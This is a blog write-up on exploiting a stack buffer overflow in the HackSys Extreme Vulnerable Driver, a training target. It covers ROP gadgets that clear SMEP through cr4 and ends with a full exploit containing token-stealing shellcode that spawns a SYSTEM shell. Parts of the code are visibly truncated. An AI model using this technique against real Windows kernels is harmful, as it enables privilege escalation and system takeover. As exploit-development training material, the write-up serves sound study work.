6 minute read

Exploiting Buffer Overflow

Finding The IOCTL

For start, we need to find the IOCTL in order to trigger the StackBufferOverflow handler. After looking at ida we can see the following-

The IOCTL is 0x222003.

Code Overview

Looking at BufferOverflowStack function -

We can see it takes two arguments, UserBuffer and Size. Where Size is the size of UserBuffer.

Let’s go over the important parts here, First, We can see there is a 2048 bytes buffer allocation, I named the variable “local_allocated_buffer”. Seconed, the buffer is being filled with zeros.

char local_allocated_buffer[2048];
memset(local_allocated_buffer, 0, sizeof(local_allocated_buffer));

Then we can see a call to ProbeForRead which validates that UserBuffer is allocated in user space. Last, we see the following memmove call -

memmove(local_allocated_buffer, UserBuffer, Size);

This line is where the vulnerability occures, the UserBuffer is being moved into local_allocated_buffer without validating that Size <= 2048, this is a vanilla buffer overflow .

Exploiting The Vulnerability

Let’s write a POC for crashing the system -

#include <iostream>
#include <Windows.h>

#define IO_CODE 0x222003

int main() {

	auto hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, NULL, 0x3, 0, NULL);

	if (hDevice == INVALID_HANDLE_VALUE) {
		std::cout << "Unable to get a handle to the driver" << std::endl;

	DWORD bytesReturned;

	char exploitBuffer[0x1000]; // 0x800 = 2048.

	memset(exploitBuffer, 'A', sizeof(exploitBuffer));

	DeviceIoControl(hDevice, IO_CODE, exploitBuffer, sizeof(exploitBuffer), NULL, 0, &bytesReturned, NULL);


	return 0;

Here, we supply a buffer in size of 0x1000 which is 4096 bytes. Running the above is causing a system crash -

We can see it happend during the ret instruction, Let’s dump the stack to see the address we are attempting to return to -

Awesome, it means we can control rip when returning from the function.

Finding ret Exact Offest

We need to find the exact offset of the ret instruction, we can do it by using some pattern generator like this one - wiremask.eu

Or, we can just look at the assembly and figure it out -

From xpn’s blog -

We can see that our data is 800h in size, adding 8 bytes to that because of rbp being pushed to the stack at the start of the function and we get 808h=2056, this is the size of the buffer, now we want to add 8 more bytes that will be used for rip.

char exploit[2056 + 8];
memset(exploit, 'A', sizeof(exploit-8));
*(unsigned long long *)(exploit + 2056) = (unsigned long long)shellcode;

The above code would have been great if we were to exploit Window 7, but, since Windows 8.1 we have SMEP in place so we can’t execute our shellcode from user space. Or can we? Last blog I coverd one way of bypassing SMEP by flipping a bit in the pte, this time we are going to use ROP in order to flip a bit in cr4. If you don’t know what SMEP is there is a lot of information about it in google so just search it, or refer to my last blog post.

Finding ROP Gadgets

The first gadget we are going to use is -

pop rcx

We can use a tool like ROPgadget

ROPgadget --binary /mnt/c/Windows/System32/ntoskrnl.exe | grep "pop rcx ; ret"

Unfortunately, at the time writing this part I didn’t have a setup so I am going to use the offsets from h0mbre’s blog.

As he states in his blog we can find the gadget we are after in HvlEndSystemInterrupt -

kd> uf HvlEndSystemInterrupt
fffff800`10dc1560 4851            push    rcx
fffff800`10dc1562 50              push    rax
fffff800`10dc1563 52              push    rdx
fffff800`10dc1564 65488b142588610000 mov   rdx,qword ptr gs:[6188h]
fffff800`10dc156d b970000040      mov     ecx,40000070h
fffff800`10dc1572 0fba3200        btr     dword ptr [rdx],0
fffff800`10dc1576 7206            jb      nt!HvlEndSystemInterrupt+0x1e (fffff800`10dc157e)

fffff800`10dc1578 33c0            xor     eax,eax
fffff800`10dc157a 8bd0            mov     edx,eax
fffff800`10dc157c 0f30            wrmsr

fffff800`10dc157e 5a              pop     rdx
fffff800`10dc157f 58              pop     rax
fffff800`10dc1580 59              pop     rcx // Gadget at offset from nt: +0x146580
fffff800`10dc1581 c3              ret

We can set a value in rcx as we can see at the assembly. The seconed gadget we are looking for is -

mov cr4, rcx

The above gadget can be found at KiEnableXSave -

kd> uf nt!KiEnableXSave


nt! ?? ::OKHAJAOM::`string'+0x32fc:
fffff800`1105142c 480fbaf112      btr     rcx,12h
fffff800`11051431 0f22e1          mov     cr4,rcx // Gadget at offset from nt: +0x3D6431
fffff800`11051434 c3              ret

Final Exploit Code

#include <iostream>
#include <Windows.h>
#include <Psapi.h>

#define IO_CODE 0x222003

unsigned long long getKernelBaseAddress() {

	void* lpImageBase[1024];
	unsigned long lpcbNeeded;

	int baseOfDrivers = EnumDeviceDrivers(

	if (!baseOfDrivers)
		std::cout << "[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n" << GetLastError() << std::endl;

	// ntoskrnl.exe is the first module dumped in the array.
	unsigned long long kernelBaseAddress = (unsigned long long)lpImageBase[0];

	std::cout << "[+] ntoskrnl.exe is located at: 0x%llx\n" << kernelBaseAddress << std::endl;

	return kernelBaseAddress;

void sendPayload(HANDLE hDevice, ULONG64 kernel_base) {

    std::cout << "[+] Allocating RWX shellcode..." << std::endl;

    // slightly altered shellcode from 
    // https://github.com/Cn33liz/HSEVD-StackOverflowX64/blob/master/HS-StackOverflowX64/HS-StackOverflowX64.c
    // thank you @Cneelis
    BYTE shellcode[] =
        "\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, [gs:188h]       ; Get _ETHREAD pointer from KPCR
        "\x4C\x8B\x82\xB8\x00\x00\x00"              // mov r8, [rdx + b8h]      ; _EPROCESS (kd> u PsGetCurrentProcess)
        "\x4D\x8B\x88\xf0\x02\x00\x00"              // mov r9, [r8 + 2f0h]      ; ActiveProcessLinks list head
        "\x49\x8B\x09"                              // mov rcx, [r9]            ; Follow link to first process in list
        "\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; Offset from ActiveProcessLinks to UniqueProcessId
        "\x48\x83\xFA\x04"                          // cmp rdx, 4               ; Process with ID 4 is System process
        "\x74\x05"                                  // jz found_system          ; Found SYSTEM token
        "\x48\x8B\x09"                              // mov rcx, [rcx]           ; Follow _LIST_ENTRY Flink pointer
        "\xEB\xF1"                                  // jmp find_system_proc     ; Loop
        "\x48\x8B\x41\x68"                          // mov rax, [rcx + 68h]     ; Offset from ActiveProcessLinks to Token
        "\x24\xF0"                                  // and al, 0f0h             ; Clear low 4 bits of _EX_FAST_REF structure
        "\x49\x89\x80\x58\x03\x00\x00"              // mov [r8 + 358h], rax     ; Copy SYSTEM token to current process's token
        "\x48\x83\xC4\x40"                          // add rsp, 040h
        "\x48\x31\xF6"                              // xor rsi, rsi             ; Zeroing out rsi register to avoid Crash
        "\x48\x31\xC0"                              // xor rax, rax             ; NTSTATUS Status = STATUS_SUCCESS

    LPVOID shellcode_addr = VirtualAlloc(NULL,

    memcpy(shellcode_addr, shellcode, sizeof(shellcode));

    std::cout << "[+] Shellcode allocated in userland at: 0x" << (ULONG64)shellcode_addr << std::endl;

    BYTE input_buff[2088] = { 0 };

    ULONG64 pop_rcx_offset = kernel_base + 0x146580; // gadget 1
    std::cout << "[+] POP RCX gadget located at: 0x" << pop_rcx_offset << std::endl;
    ULONG64 rcx_value = 0x70678; // value we want placed in cr4
    ULONG64 mov_cr4_offset = kernel_base + 0x3D6431; // gadget 2
    std::cout << "[+] MOV CR4, RCX gadget located at: 0x" << mov_cr4_offset << std::endl;

    memset(input_buff, '\x41', 2056);
    memcpy(input_buff + 2056, (PULONG64)&pop_rcx_offset, 8); // pop rcx
    memcpy(input_buff + 2064, (PULONG64)&rcx_value, 8); // disable SMEP value
    memcpy(input_buff + 2072, (PULONG64)&mov_cr4_offset, 8); // mov cr4, rcx
    memcpy(input_buff + 2080, (PULONG64)&shellcode_addr, 8); // shellcode

    std::cout << "[+] Input buff located at: 0x" << (INT64)&input_buff << std::endl;

    DWORD bytes_ret = 0x0;

    std::cout << "[+] Sending payload..." << std::endl;

    int result = DeviceIoControl(hDevice,

    if (!result) {
        std::cout << "[-] DeviceIoControl failed!" << std::endl;

void spawnShell() {
    std::cout << "[+] Spawning nt authority/system shell..." << std::endl;

    STARTUPINFOA si = { 0 };


int main() {

	auto hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, NULL, 0x3, 0, NULL);

	if (hDevice == INVALID_HANDLE_VALUE) {
		std::cout << "[-] Unable to get a handle to the driver" << std::endl;

    auto kernelBase = getKernelBaseAddress();

    sendPayload(hDevice, kernelBase);

	return 0;

The picture is from h0mbre’s blog, again, I didn’t have a setup at the time writing this part, but I can promise you it worked on my machine ;)

Hopefully in the next write up I am going to write about Buffer Overflow with GS, on RS5. Thank you for reading, and thanks to all the amazing write ups out there that I can study from.